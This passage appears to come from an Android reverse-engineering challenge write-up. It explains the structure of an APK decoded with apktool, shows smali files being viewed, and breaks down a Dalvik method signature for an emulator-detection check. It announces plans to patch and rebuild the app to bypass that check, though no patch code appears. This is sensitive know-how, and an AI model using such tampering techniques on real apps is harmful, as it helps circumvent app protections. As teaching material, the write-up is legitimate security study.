We can see the internal structure of the decoded APK: the AndroidManifest.xml file and the different folders, such as the one containing the smali code. It is important to remember the normal APK structure.

  • smali — disassembled java code
  • res — resources, strings
  • assets — files bundled inside the APK
  • lib — native libraries (*.so files)
  • AndroidManifest.xml — decoded version
  • original and apktool.yml — used by apktool

After decoding the app, we can see the AndroidManifest.xml.

If we look inside the smali folder, we can see all the smali files:

$more ChallengeJNI\$1.smali
$more ChallengeJNI.smali

As we can see, working with smali code is harder than with Java, so we will use the Java decompilers to analyze and interpret the application code. After that, we will modify the application to obtain the bypassed smali code and rebuild the application. To do that we will make use of some Dalvik opcodes.

Understanding dalvik opcodes:

This link is really useful; I used it to create a table showing some of the most interesting examples of the “dalvik opcodes” used by the application.

Something that we will see very often in the code is a line like this:

“.method private checkIfDeviceIsEmulator ()Ljava/lang/Boolean;”

It’s important to understand the meaning of this, so let’s break it down:

  1. “.method private” -> the method’s visibility and type.
  2. checkIfDeviceIsEmulator -> the method name.
  3. ()Ljava/lang/Boolean; -> the empty parentheses mean the method takes no parameters; the return type is a class reference, prefixed with L, with dots “.” replaced by slashes “/” and suffixed with a semicolon “;”.